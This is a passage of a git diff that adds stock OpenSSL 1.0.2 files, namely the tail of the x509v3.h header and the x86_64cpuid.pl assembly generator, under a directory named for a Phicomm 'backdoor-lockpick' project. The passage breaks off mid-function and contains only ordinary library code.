+int X509V3_EXT_add_nconf_sk(CONF *conf, X509V3_CTX *ctx, char *section,
+                            STACK_OF(X509_EXTENSION) **sk);
+int X509V3_EXT_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section,
+                         X509 *cert);
+int X509V3_EXT_REQ_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section,
+                             X509_REQ *req);
+int X509V3_EXT_CRL_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section,
+                             X509_CRL *crl);
+
+X509_EXTENSION *X509V3_EXT_conf_nid(LHASH_OF(CONF_VALUE) *conf,
+                                    X509V3_CTX *ctx, int ext_nid,
+                                    char *value);
+X509_EXTENSION *X509V3_EXT_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
+                                char *name, char *value);
+int X509V3_EXT_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
+                        char *section, X509 *cert);
+int X509V3_EXT_REQ_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
+                            char *section, X509_REQ *req);
+int X509V3_EXT_CRL_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
+                            char *section, X509_CRL *crl);
+
+int X509V3_add_value_bool_nf(char *name, int asn1_bool,
+                             STACK_OF(CONF_VALUE) **extlist);
+int X509V3_get_value_bool(CONF_VALUE *value, int *asn1_bool);
+int X509V3_get_value_int(CONF_VALUE *value, ASN1_INTEGER **aint);
+void X509V3_set_nconf(X509V3_CTX *ctx, CONF *conf);
+void X509V3_set_conf_lhash(X509V3_CTX *ctx, LHASH_OF(CONF_VALUE) *lhash);
+# endif
+
+char *X509V3_get_string(X509V3_CTX *ctx, char *name, char *section);
+STACK_OF(CONF_VALUE) *X509V3_get_section(X509V3_CTX *ctx, char *section);
+void X509V3_string_free(X509V3_CTX *ctx, char *str);
+void X509V3_section_free(X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *section);
+void X509V3_set_ctx(X509V3_CTX *ctx, X509 *issuer, X509 *subject,
+                    X509_REQ *req, X509_CRL *crl, int flags);
+
+int X509V3_add_value(const char *name, const char *value,
+                     STACK_OF(CONF_VALUE) **extlist);
+int X509V3_add_value_uchar(const char *name, const unsigned char *value,
+                           STACK_OF(CONF_VALUE) **extlist);
+int X509V3_add_value_bool(const char *name, int asn1_bool,
+                          STACK_OF(CONF_VALUE) **extlist);
+int X509V3_add_value_int(const char *name, ASN1_INTEGER *aint,
+                         STACK_OF(CONF_VALUE) **extlist);
+char *i2s_ASN1_INTEGER(X509V3_EXT_METHOD *meth, ASN1_INTEGER *aint);
+ASN1_INTEGER *s2i_ASN1_INTEGER(X509V3_EXT_METHOD *meth, char *value);
+char *i2s_ASN1_ENUMERATED(X509V3_EXT_METHOD *meth, ASN1_ENUMERATED *aint);
+char *i2s_ASN1_ENUMERATED_TABLE(X509V3_EXT_METHOD *meth,
+                                ASN1_ENUMERATED *aint);
+int X509V3_EXT_add(X509V3_EXT_METHOD *ext);
+int X509V3_EXT_add_list(X509V3_EXT_METHOD *extlist);
+int X509V3_EXT_add_alias(int nid_to, int nid_from);
+void X509V3_EXT_cleanup(void);
+
+const X509V3_EXT_METHOD *X509V3_EXT_get(X509_EXTENSION *ext);
+const X509V3_EXT_METHOD *X509V3_EXT_get_nid(int nid);
+int X509V3_add_standard_extensions(void);
+STACK_OF(CONF_VALUE) *X509V3_parse_list(const char *line);
+void *X509V3_EXT_d2i(X509_EXTENSION *ext);
+void *X509V3_get_d2i(STACK_OF(X509_EXTENSION) *x, int nid, int *crit,
+                     int *idx);
+int X509V3_EXT_free(int nid, void *ext_data);
+
+X509_EXTENSION *X509V3_EXT_i2d(int ext_nid, int crit, void *ext_struc);
+int X509V3_add1_i2d(STACK_OF(X509_EXTENSION) **x, int nid, void *value,
+                    int crit, unsigned long flags);
+
+char *hex_to_string(const unsigned char *buffer, long len);
+unsigned char *string_to_hex(const char *str, long *len);
+int name_cmp(const char *name, const char *cmp);
+
+void X509V3_EXT_val_prn(BIO *out, STACK_OF(CONF_VALUE) *val, int indent,
+                        int ml);
+int X509V3_EXT_print(BIO *out, X509_EXTENSION *ext, unsigned long flag,
+                     int indent);
+int X509V3_EXT_print_fp(FILE *out, X509_EXTENSION *ext, int flag, int indent);
+
+int X509V3_extensions_print(BIO *out, char *title,
+                            STACK_OF(X509_EXTENSION) *exts,
+                            unsigned long flag, int indent);
+
+int X509_check_ca(X509 *x);
+int X509_check_purpose(X509 *x, int id, int ca);
+int X509_supported_extension(X509_EXTENSION *ex);
+int X509_PURPOSE_set(int *p, int purpose);
+int X509_check_issued(X509 *issuer, X509 *subject);
+int X509_check_akid(X509 *issuer, AUTHORITY_KEYID *akid);
+int X509_PURPOSE_get_count(void);
+X509_PURPOSE *X509_PURPOSE_get0(int idx);
+int X509_PURPOSE_get_by_sname(char *sname);
+int X509_PURPOSE_get_by_id(int id);
+int X509_PURPOSE_add(int id, int trust, int flags,
+                     int (*ck) (const X509_PURPOSE *, const X509 *, int),
+                     char *name, char *sname, void *arg);
+char *X509_PURPOSE_get0_name(X509_PURPOSE *xp);
+char *X509_PURPOSE_get0_sname(X509_PURPOSE *xp);
+int X509_PURPOSE_get_trust(X509_PURPOSE *xp);
+void X509_PURPOSE_cleanup(void);
+int X509_PURPOSE_get_id(X509_PURPOSE *);
+
+STACK_OF(OPENSSL_STRING) *X509_get1_email(X509 *x);
+STACK_OF(OPENSSL_STRING) *X509_REQ_get1_email(X509_REQ *x);
+void X509_email_free(STACK_OF(OPENSSL_STRING) *sk);
+STACK_OF(OPENSSL_STRING) *X509_get1_ocsp(X509 *x);
+/* Flags for X509_check_* functions */
+
+/*
+ * Always check subject name for host match even if subject alt names present
+ */
+# define X509_CHECK_FLAG_ALWAYS_CHECK_SUBJECT    0x1
+/* Disable wildcard matching for dnsName fields and common name. */
+# define X509_CHECK_FLAG_NO_WILDCARDS    0x2
+/* Wildcards must not match a partial label. */
+# define X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS 0x4
+/* Allow (non-partial) wildcards to match multiple labels. */
+# define X509_CHECK_FLAG_MULTI_LABEL_WILDCARDS 0x8
+/* Constraint verifier subdomain patterns to match a single labels. */
+# define X509_CHECK_FLAG_SINGLE_LABEL_SUBDOMAINS 0x10
+/*
+ * Match reference identifiers starting with "." to any sub-domain.
+ * This is a non-public flag, turned on implicitly when the subject
+ * reference identity is a DNS name.
+ */
+# define _X509_CHECK_FLAG_DOT_SUBDOMAINS 0x8000
+
+int X509_check_host(X509 *x, const char *chk, size_t chklen,
+                    unsigned int flags, char **peername);
+int X509_check_email(X509 *x, const char *chk, size_t chklen,
+                     unsigned int flags);
+int X509_check_ip(X509 *x, const unsigned char *chk, size_t chklen,
+                  unsigned int flags);
+int X509_check_ip_asc(X509 *x, const char *ipasc, unsigned int flags);
+
+ASN1_OCTET_STRING *a2i_IPADDRESS(const char *ipasc);
+ASN1_OCTET_STRING *a2i_IPADDRESS_NC(const char *ipasc);
+int a2i_ipadd(unsigned char *ipout, const char *ipasc);
+int X509V3_NAME_from_section(X509_NAME *nm, STACK_OF(CONF_VALUE) *dn_sk,
+                             unsigned long chtype);
+
+void X509_POLICY_NODE_print(BIO *out, X509_POLICY_NODE *node, int indent);
+DECLARE_STACK_OF(X509_POLICY_NODE)
+
+# ifndef OPENSSL_NO_RFC3779
+
+typedef struct ASRange_st {
+    ASN1_INTEGER *min, *max;
+} ASRange;
+
+#  define ASIdOrRange_id          0
+#  define ASIdOrRange_range       1
+
+typedef struct ASIdOrRange_st {
+    int type;
+    union {
+        ASN1_INTEGER *id;
+        ASRange *range;
+    } u;
+} ASIdOrRange;
+
+typedef STACK_OF(ASIdOrRange) ASIdOrRanges;
+DECLARE_STACK_OF(ASIdOrRange)
+
+#  define ASIdentifierChoice_inherit              0
+#  define ASIdentifierChoice_asIdsOrRanges        1
+
+typedef struct ASIdentifierChoice_st {
+    int type;
+    union {
+        ASN1_NULL *inherit;
+        ASIdOrRanges *asIdsOrRanges;
+    } u;
+} ASIdentifierChoice;
+
+typedef struct ASIdentifiers_st {
+    ASIdentifierChoice *asnum, *rdi;
+} ASIdentifiers;
+
+DECLARE_ASN1_FUNCTIONS(ASRange)
+DECLARE_ASN1_FUNCTIONS(ASIdOrRange)
+DECLARE_ASN1_FUNCTIONS(ASIdentifierChoice)
+DECLARE_ASN1_FUNCTIONS(ASIdentifiers)
+
+typedef struct IPAddressRange_st {
+    ASN1_BIT_STRING *min, *max;
+} IPAddressRange;
+
+#  define IPAddressOrRange_addressPrefix  0
+#  define IPAddressOrRange_addressRange   1
+
+typedef struct IPAddressOrRange_st {
+    int type;
+    union {
+        ASN1_BIT_STRING *addressPrefix;
+        IPAddressRange *addressRange;
+    } u;
+} IPAddressOrRange;
+
+typedef STACK_OF(IPAddressOrRange) IPAddressOrRanges;
+DECLARE_STACK_OF(IPAddressOrRange)
+
+#  define IPAddressChoice_inherit                 0
+#  define IPAddressChoice_addressesOrRanges       1
+
+typedef struct IPAddressChoice_st {
+    int type;
+    union {
+        ASN1_NULL *inherit;
+        IPAddressOrRanges *addressesOrRanges;
+    } u;
+} IPAddressChoice;
+
+typedef struct IPAddressFamily_st {
+    ASN1_OCTET_STRING *addressFamily;
+    IPAddressChoice *ipAddressChoice;
+} IPAddressFamily;
+
+typedef STACK_OF(IPAddressFamily) IPAddrBlocks;
+DECLARE_STACK_OF(IPAddressFamily)
+
+DECLARE_ASN1_FUNCTIONS(IPAddressRange)
+DECLARE_ASN1_FUNCTIONS(IPAddressOrRange)
+DECLARE_ASN1_FUNCTIONS(IPAddressChoice)
+DECLARE_ASN1_FUNCTIONS(IPAddressFamily)
+
+/*
+ * API tag for elements of the ASIdentifer SEQUENCE.
+ */
+#  define V3_ASID_ASNUM   0
+#  define V3_ASID_RDI     1
+
+/*
+ * AFI values, assigned by IANA.  It'd be nice to make the AFI
+ * handling code totally generic, but there are too many little things
+ * that would need to be defined for other address families for it to
+ * be worth the trouble.
+ */
+#  define IANA_AFI_IPV4   1
+#  define IANA_AFI_IPV6   2
+
+/*
+ * Utilities to construct and extract values from RFC3779 extensions,
+ * since some of the encodings (particularly for IP address prefixes
+ * and ranges) are a bit tedious to work with directly.
+ */
+int v3_asid_add_inherit(ASIdentifiers *asid, int which);
+int v3_asid_add_id_or_range(ASIdentifiers *asid, int which,
+                            ASN1_INTEGER *min, ASN1_INTEGER *max);
+int v3_addr_add_inherit(IPAddrBlocks *addr,
+                        const unsigned afi, const unsigned *safi);
+int v3_addr_add_prefix(IPAddrBlocks *addr,
+                       const unsigned afi, const unsigned *safi,
+                       unsigned char *a, const int prefixlen);
+int v3_addr_add_range(IPAddrBlocks *addr,
+                      const unsigned afi, const unsigned *safi,
+                      unsigned char *min, unsigned char *max);
+unsigned v3_addr_get_afi(const IPAddressFamily *f);
+int v3_addr_get_range(IPAddressOrRange *aor, const unsigned afi,
+                      unsigned char *min, unsigned char *max,
+                      const int length);
+
+/*
+ * Canonical forms.
+ */
+int v3_asid_is_canonical(ASIdentifiers *asid);
+int v3_addr_is_canonical(IPAddrBlocks *addr);
+int v3_asid_canonize(ASIdentifiers *asid);
+int v3_addr_canonize(IPAddrBlocks *addr);
+
+/*
+ * Tests for inheritance and containment.
+ */
+int v3_asid_inherits(ASIdentifiers *asid);
+int v3_addr_inherits(IPAddrBlocks *addr);
+int v3_asid_subset(ASIdentifiers *a, ASIdentifiers *b);
+int v3_addr_subset(IPAddrBlocks *a, IPAddrBlocks *b);
+
+/*
+ * Check whether RFC 3779 extensions nest properly in chains.
+ */
+int v3_asid_validate_path(X509_STORE_CTX *);
+int v3_addr_validate_path(X509_STORE_CTX *);
+int v3_asid_validate_resource_set(STACK_OF(X509) *chain,
+                                  ASIdentifiers *ext, int allow_inheritance);
+int v3_addr_validate_resource_set(STACK_OF(X509) *chain,
+                                  IPAddrBlocks *ext, int allow_inheritance);
+
+# endif                         /* OPENSSL_NO_RFC3779 */
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_X509V3_strings(void);
+
+/* Error codes for the X509V3 functions. */
+
+/* Function codes. */
+# define X509V3_F_A2I_GENERAL_NAME                        164
+# define X509V3_F_ASIDENTIFIERCHOICE_CANONIZE             161
+# define X509V3_F_ASIDENTIFIERCHOICE_IS_CANONICAL         162
+# define X509V3_F_COPY_EMAIL                              122
+# define X509V3_F_COPY_ISSUER                             123
+# define X509V3_F_DO_DIRNAME                              144
+# define X509V3_F_DO_EXT_CONF                             124
+# define X509V3_F_DO_EXT_I2D                              135
+# define X509V3_F_DO_EXT_NCONF                            151
+# define X509V3_F_DO_I2V_NAME_CONSTRAINTS                 148
+# define X509V3_F_GNAMES_FROM_SECTNAME                    156
+# define X509V3_F_HEX_TO_STRING                           111
+# define X509V3_F_I2S_ASN1_ENUMERATED                     121
+# define X509V3_F_I2S_ASN1_IA5STRING                      149
+# define X509V3_F_I2S_ASN1_INTEGER                        120
+# define X509V3_F_I2V_AUTHORITY_INFO_ACCESS               138
+# define X509V3_F_NOTICE_SECTION                          132
+# define X509V3_F_NREF_NOS                                133
+# define X509V3_F_POLICY_SECTION                          131
+# define X509V3_F_PROCESS_PCI_VALUE                       150
+# define X509V3_F_R2I_CERTPOL                             130
+# define X509V3_F_R2I_PCI                                 155
+# define X509V3_F_S2I_ASN1_IA5STRING                      100
+# define X509V3_F_S2I_ASN1_INTEGER                        108
+# define X509V3_F_S2I_ASN1_OCTET_STRING                   112
+# define X509V3_F_S2I_ASN1_SKEY_ID                        114
+# define X509V3_F_S2I_SKEY_ID                             115
+# define X509V3_F_SET_DIST_POINT_NAME                     158
+# define X509V3_F_STRING_TO_HEX                           113
+# define X509V3_F_SXNET_ADD_ID_ASC                        125
+# define X509V3_F_SXNET_ADD_ID_INTEGER                    126
+# define X509V3_F_SXNET_ADD_ID_ULONG                      127
+# define X509V3_F_SXNET_GET_ID_ASC                        128
+# define X509V3_F_SXNET_GET_ID_ULONG                      129
+# define X509V3_F_V2I_ASIDENTIFIERS                       163
+# define X509V3_F_V2I_ASN1_BIT_STRING                     101
+# define X509V3_F_V2I_AUTHORITY_INFO_ACCESS               139
+# define X509V3_F_V2I_AUTHORITY_KEYID                     119
+# define X509V3_F_V2I_BASIC_CONSTRAINTS                   102
+# define X509V3_F_V2I_CRLD                                134
+# define X509V3_F_V2I_EXTENDED_KEY_USAGE                  103
+# define X509V3_F_V2I_GENERAL_NAMES                       118
+# define X509V3_F_V2I_GENERAL_NAME_EX                     117
+# define X509V3_F_V2I_IDP                                 157
+# define X509V3_F_V2I_IPADDRBLOCKS                        159
+# define X509V3_F_V2I_ISSUER_ALT                          153
+# define X509V3_F_V2I_NAME_CONSTRAINTS                    147
+# define X509V3_F_V2I_POLICY_CONSTRAINTS                  146
+# define X509V3_F_V2I_POLICY_MAPPINGS                     145
+# define X509V3_F_V2I_SUBJECT_ALT                         154
+# define X509V3_F_V3_ADDR_VALIDATE_PATH_INTERNAL          160
+# define X509V3_F_V3_GENERIC_EXTENSION                    116
+# define X509V3_F_X509V3_ADD1_I2D                         140
+# define X509V3_F_X509V3_ADD_VALUE                        105
+# define X509V3_F_X509V3_EXT_ADD                          104
+# define X509V3_F_X509V3_EXT_ADD_ALIAS                    106
+# define X509V3_F_X509V3_EXT_CONF                         107
+# define X509V3_F_X509V3_EXT_FREE                         165
+# define X509V3_F_X509V3_EXT_I2D                          136
+# define X509V3_F_X509V3_EXT_NCONF                        152
+# define X509V3_F_X509V3_GET_SECTION                      142
+# define X509V3_F_X509V3_GET_STRING                       143
+# define X509V3_F_X509V3_GET_VALUE_BOOL                   110
+# define X509V3_F_X509V3_PARSE_LIST                       109
+# define X509V3_F_X509_PURPOSE_ADD                        137
+# define X509V3_F_X509_PURPOSE_SET                        141
+
+/* Reason codes. */
+# define X509V3_R_BAD_IP_ADDRESS                          118
+# define X509V3_R_BAD_OBJECT                              119
+# define X509V3_R_BN_DEC2BN_ERROR                         100
+# define X509V3_R_BN_TO_ASN1_INTEGER_ERROR                101
+# define X509V3_R_CANNOT_FIND_FREE_FUNCTION               168
+# define X509V3_R_DIRNAME_ERROR                           149
+# define X509V3_R_DISTPOINT_ALREADY_SET                   160
+# define X509V3_R_DUPLICATE_ZONE_ID                       133
+# define X509V3_R_ERROR_CONVERTING_ZONE                   131
+# define X509V3_R_ERROR_CREATING_EXTENSION                144
+# define X509V3_R_ERROR_IN_EXTENSION                      128
+# define X509V3_R_EXPECTED_A_SECTION_NAME                 137
+# define X509V3_R_EXTENSION_EXISTS                        145
+# define X509V3_R_EXTENSION_NAME_ERROR                    115
+# define X509V3_R_EXTENSION_NOT_FOUND                     102
+# define X509V3_R_EXTENSION_SETTING_NOT_SUPPORTED         103
+# define X509V3_R_EXTENSION_VALUE_ERROR                   116
+# define X509V3_R_ILLEGAL_EMPTY_EXTENSION                 151
+# define X509V3_R_ILLEGAL_HEX_DIGIT                       113
+# define X509V3_R_INCORRECT_POLICY_SYNTAX_TAG             152
+# define X509V3_R_INVALID_ASNUMBER                        162
+# define X509V3_R_INVALID_ASRANGE                         163
+# define X509V3_R_INVALID_BOOLEAN_STRING                  104
+# define X509V3_R_INVALID_EXTENSION_STRING                105
+# define X509V3_R_INVALID_INHERITANCE                     165
+# define X509V3_R_INVALID_IPADDRESS                       166
+# define X509V3_R_INVALID_MULTIPLE_RDNS                   161
+# define X509V3_R_INVALID_NAME                            106
+# define X509V3_R_INVALID_NULL_ARGUMENT                   107
+# define X509V3_R_INVALID_NULL_NAME                       108
+# define X509V3_R_INVALID_NULL_VALUE                      109
+# define X509V3_R_INVALID_NUMBER                          140
+# define X509V3_R_INVALID_NUMBERS                         141
+# define X509V3_R_INVALID_OBJECT_IDENTIFIER               110
+# define X509V3_R_INVALID_OPTION                          138
+# define X509V3_R_INVALID_POLICY_IDENTIFIER               134
+# define X509V3_R_INVALID_PROXY_POLICY_SETTING            153
+# define X509V3_R_INVALID_PURPOSE                         146
+# define X509V3_R_INVALID_SAFI                            164
+# define X509V3_R_INVALID_SECTION                         135
+# define X509V3_R_INVALID_SYNTAX                          143
+# define X509V3_R_ISSUER_DECODE_ERROR                     126
+# define X509V3_R_MISSING_VALUE                           124
+# define X509V3_R_NEED_ORGANIZATION_AND_NUMBERS           142
+# define X509V3_R_NO_CONFIG_DATABASE                      136
+# define X509V3_R_NO_ISSUER_CERTIFICATE                   121
+# define X509V3_R_NO_ISSUER_DETAILS                       127
+# define X509V3_R_NO_POLICY_IDENTIFIER                    139
+# define X509V3_R_NO_PROXY_CERT_POLICY_LANGUAGE_DEFINED   154
+# define X509V3_R_NO_PUBLIC_KEY                           114
+# define X509V3_R_NO_SUBJECT_DETAILS                      125
+# define X509V3_R_ODD_NUMBER_OF_DIGITS                    112
+# define X509V3_R_OPERATION_NOT_DEFINED                   148
+# define X509V3_R_OTHERNAME_ERROR                         147
+# define X509V3_R_POLICY_LANGUAGE_ALREADY_DEFINED         155
+# define X509V3_R_POLICY_PATH_LENGTH                      156
+# define X509V3_R_POLICY_PATH_LENGTH_ALREADY_DEFINED      157
+# define X509V3_R_POLICY_SYNTAX_NOT_CURRENTLY_SUPPORTED   158
+# define X509V3_R_POLICY_WHEN_PROXY_LANGUAGE_REQUIRES_NO_POLICY 159
+# define X509V3_R_SECTION_NOT_FOUND                       150
+# define X509V3_R_UNABLE_TO_GET_ISSUER_DETAILS            122
+# define X509V3_R_UNABLE_TO_GET_ISSUER_KEYID              123
+# define X509V3_R_UNKNOWN_BIT_STRING_ARGUMENT             111
+# define X509V3_R_UNKNOWN_EXTENSION                       129
+# define X509V3_R_UNKNOWN_EXTENSION_NAME                  130
+# define X509V3_R_UNKNOWN_OPTION                          120
+# define X509V3_R_UNSUPPORTED_OPTION                      117
+# define X509V3_R_UNSUPPORTED_TYPE                        167
+# define X509V3_R_USER_TOO_LONG                           132
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x86_64cpuid.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x86_64cpuid.pl
new file mode 100644
index 0000000..d208d02
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x86_64cpuid.pl
@@ -0,0 +1,309 @@
+#!/usr/bin/env perl
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+($arg1,$arg2,$arg3,$arg4)=$win64?("%rcx","%rdx","%r8", "%r9") :	# Win64 order
+				 ("%rdi","%rsi","%rdx","%rcx");	# Unix order
+
+print<<___;
+.extern		OPENSSL_cpuid_setup
+.hidden		OPENSSL_cpuid_setup
+.section	.init
+	call	OPENSSL_cpuid_setup
+
+.hidden	OPENSSL_ia32cap_P
+.comm	OPENSSL_ia32cap_P,16,4
+
+.text
+
+.globl	OPENSSL_atomic_add
+.type	OPENSSL_atomic_add,\@abi-omnipotent
+.align	16
+OPENSSL_atomic_add:
+	movl	($arg1),%eax
+.Lspin:	leaq	($arg2,%rax),%r8
+	.byte	0xf0		# lock
+	cmpxchgl	%r8d,($arg1)
+	jne	.Lspin
+	movl	%r8d,%eax
+	.byte	0x48,0x98	# cltq/cdqe
+	ret
+.size	OPENSSL_atomic_add,.-OPENSSL_atomic_add
+
+.globl	OPENSSL_rdtsc
+.type	OPENSSL_rdtsc,\@abi-omnipotent
+.align	16
+OPENSSL_rdtsc:
+	rdtsc
+	shl	\$32,%rdx
+	or	%rdx,%rax
+	ret
+.size	OPENSSL_rdtsc,.-OPENSSL_rdtsc
+
+.globl	OPENSSL_ia32_cpuid
+.type	OPENSSL_ia32_cpuid,\@function,1
+.align	16
+OPENSSL_ia32_cpuid:
+	mov	%rbx,%r8		# save %rbx
+
+	xor	%eax,%eax
+	mov	%eax,8(%rdi)		# clear 3rd word
+	cpuid
+	mov	%eax,%r11d		# max value for standard query level
+
+	xor	%eax,%eax
+	cmp	\$0x756e6547,%ebx	# "Genu"
+	setne	%al
+	mov	%eax,%r9d
+	cmp	\$0x49656e69,%edx	# "ineI"
+	setne	%al
+	or	%eax,%r9d
+	cmp	\$0x6c65746e,%ecx	# "ntel"
+	setne	%al
+	or	%eax,%r9d		# 0 indicates Intel CPU
+	jz	.Lintel
+
+	cmp	\$0x68747541,%ebx	# "Auth"
+	setne	%al
+	mov	%eax,%r10d
+	cmp	\$0x69746E65,%edx	# "enti"
+	setne	%al
+	or	%eax,%r10d
+	cmp	\$0x444D4163,%ecx	# "cAMD"
+	setne	%al
+	or	%eax,%r10d		# 0 indicates AMD CPU
+	jnz	.Lintel
+
+	# AMD specific
+	mov	\$0x80000000,%eax
+	cpuid
+	cmp	\$0x80000001,%eax
+	jb	.Lintel
+	mov	%eax,%r10d
+	mov	\$0x80000001,%eax
+	cpuid
+	or	%ecx,%r9d
+	and	\$0x00000801,%r9d	# isolate AMD XOP bit, 1<<11
+
+	cmp	\$0x80000008,%r10d
+	jb	.Lintel
+
+	mov	\$0x80000008,%eax
+	cpuid
+	movzb	%cl,%r10		# number of cores - 1
+	inc	%r10			# number of cores
+
+	mov	\$1,%eax
+	cpuid
+	bt	\$28,%edx		# test hyper-threading bit
+	jnc	.Lgeneric
+	shr	\$16,%ebx		# number of logical processors
+	cmp	%r10b,%bl
+	ja	.Lgeneric
+	and	\$0xefffffff,%edx	# ~(1<<28)
+	jmp	.Lgeneric
+
+.Lintel:
+	cmp	\$4,%r11d
+	mov	\$-1,%r10d
+	jb	.Lnocacheinfo
+
+	mov	\$4,%eax
+	mov	\$0,%ecx		# query L1D
+	cpuid
+	mov	%eax,%r10d
+	shr	\$14,%r10d
+	and	\$0xfff,%r10d		# number of cores -1 per L1D
+
+	cmp	\$7,%r11d
+	jb	.Lnocacheinfo
+
+	mov	\$7,%eax
+	xor	%ecx,%ecx
+	cpuid
+	mov	%ebx,8(%rdi)
+
+.Lnocacheinfo:
+	mov	\$1,%eax
+	cpuid
+	and	\$0xbfefffff,%edx	# force reserved bits to 0
+	cmp	\$0,%r9d
+	jne	.Lnotintel
+	or	\$0x40000000,%edx	# set reserved bit#30 on Intel CPUs
+	and	\$15,%ah
+	cmp	\$15,%ah		# examine Family ID
+	jne	.Lnotintel
+	or	\$0x00100000,%edx	# set reserved bit#20 to engage RC4_CHAR
+.Lnotintel:
+	bt	\$28,%edx		# test hyper-threading bit
+	jnc	.Lgeneric
+	and	\$0xefffffff,%edx	# ~(1<<28)
+	cmp	\$0,%r10d
+	je	.Lgeneric
+
+	or	\$0x10000000,%edx	# 1<<28
+	shr	\$16,%ebx
+	cmp	\$1,%bl			# see if cache is shared
+	ja	.Lgeneric
+	and	\$0xefffffff,%edx	# ~(1<<28)
+.Lgeneric:
+	and	\$0x00000800,%r9d	# isolate AMD XOP flag
+	and	\$0xfffff7ff,%ecx
+	or	%ecx,%r9d		# merge AMD XOP flag
+
+	mov	%edx,%r10d		# %r9d:%r10d is copy of %ecx:%edx
+	bt	\$27,%r9d		# check OSXSAVE bit
+	jnc	.Lclear_avx
+	xor	%ecx,%ecx		# XCR0
+	.byte	0x0f,0x01,0xd0		# xgetbv
+	and	\$6,%eax		# isolate XMM and YMM state support
+	cmp	\$6,%eax
+	je	.Ldone
+.Lclear_avx:
+	mov	\$0xefffe7ff,%eax	# ~(1<<28|1<<12|1<<11)
+	and	%eax,%r9d		# clear AVX, FMA and AMD XOP bits
+	andl	\$0xffffffdf,8(%rdi)	# cleax AVX2, ~(1<<5)
+.Ldone:
+	shl	\$32,%r9
+	mov	%r10d,%eax
+	mov	%r8,%rbx		# restore %rbx
+	or	%r9,%rax
+	ret
+.size	OPENSSL_ia32_cpuid,.-OPENSSL_ia32_cpuid
+
+.globl  OPENSSL_cleanse
+.type   OPENSSL_cleanse,\@abi-omnipotent
+.align  16
+OPENSSL_cleanse:
+	xor	%rax,%rax
+	cmp	\$15,$arg2
+	jae	.Lot
+	cmp	\$0,$arg2
+	je	.Lret
+.Little:
+	mov	%al,($arg1)
+	sub	\$1,$arg2
+	lea	1($arg1),$arg1
+	jnz	.Little
+.Lret:
+	ret
+.align	16
+.Lot:
+	test	\$7,$arg1
+	jz	.Laligned
+	mov	%al,($arg1)
+	lea	-1($arg2),$arg2
+	lea	1($arg1),$arg1
+	jmp	.Lot
+.Laligned:
+	mov	%rax,($arg1)
+	lea	-8($arg2),$arg2
+	test	\$-8,$arg2
+	lea	8($arg1),$arg1
+	jnz	.Laligned
+	cmp	\$0,$arg2
+	jne	.Little
+	ret
+.size	OPENSSL_cleanse,.-OPENSSL_cleanse
+___
+
+print<<___ if (!$win64);
+.globl	OPENSSL_wipe_cpu
+.type	OPENSSL_wipe_cpu,\@abi-omnipotent
+.align	16
+OPENSSL_wipe_cpu:
+	pxor	%xmm0,%xmm0
+	pxor	%xmm1,%xmm1
+	pxor	%xmm2,%xmm2
+	pxor	%xmm3,%xmm3
+	pxor	%xmm4,%xmm4
+	pxor	%xmm5,%xmm5
+	pxor	%xmm6,%xmm6
+	pxor	%xmm7,%xmm7
+	pxor	%xmm8,%xmm8
+	pxor	%xmm9,%xmm9
+	pxor	%xmm10,%xmm10
+	pxor	%xmm11,%xmm11
+	pxor	%xmm12,%xmm12
+	pxor	%xmm13,%xmm13
+	pxor	%xmm14,%xmm14
+	pxor	%xmm15,%xmm15
+	xorq	%rcx,%rcx
+	xorq	%rdx,%rdx
+	xorq	%rsi,%rsi
+	xorq	%rdi,%rdi
+	xorq	%r8,%r8
+	xorq	%r9,%r9
+	xorq	%r10,%r10
+	xorq	%r11,%r11
+	leaq	8(%rsp),%rax
+	ret
+.size	OPENSSL_wipe_cpu,.-OPENSSL_wipe_cpu
+___
+print<<___ if ($win64);
+.globl	OPENSSL_wipe_cpu
+.type	OPENSSL_wipe_cpu,\@abi-omnipotent
+.align	16
+OPENSSL_wipe_cpu:
+	pxor	%xmm0,%xmm0
+	pxor	%xmm1,%xmm1
+	pxor	%xmm2,%xmm2
+	pxor	%xmm3,%xmm3
+	pxor	%xmm4,%xmm4
+	pxor	%xmm5,%xmm5
+	xorq	%rcx,%rcx
+	xorq	%rdx,%rdx
+	xorq	%r8,%r8
+	xorq	%r9,%r9
+	xorq	%r10,%r10
+	xorq	%r11,%r11
+	leaq	8(%rsp),%rax
+	ret
+.size	OPENSSL_wipe_cpu,.-OPENSSL_wipe_cpu
+___
+
+print<<___;
+.globl	OPENSSL_ia32_rdrand
+.type	OPENSSL_ia32_rdrand,\@abi-omnipotent
+.align	16
+OPENSSL_ia32_rdrand:
+	mov	\$8,%ecx
+.Loop_rdrand:
+	rdrand	%rax
+	jc	.Lbreak_rdrand
+	loop	.Loop_rdrand
+.Lbreak_rdrand:
+	cmp	\$0,%rax
+	cmove	%rcx,%rax
+	ret
+.size	OPENSSL_ia32_rdrand,.-OPENSSL_ia32_rdrand
+
+.globl	OPENSSL_ia32_rdseed
+.type	OPENSSL_ia32_rdseed,\@abi-omnipotent
+.align	16
+OPENSSL_ia32_rdseed:
+	mov	\$8,%ecx
+.Loop_rdseed:
+	rdseed	%rax
+	jc	.Lbreak_rdseed
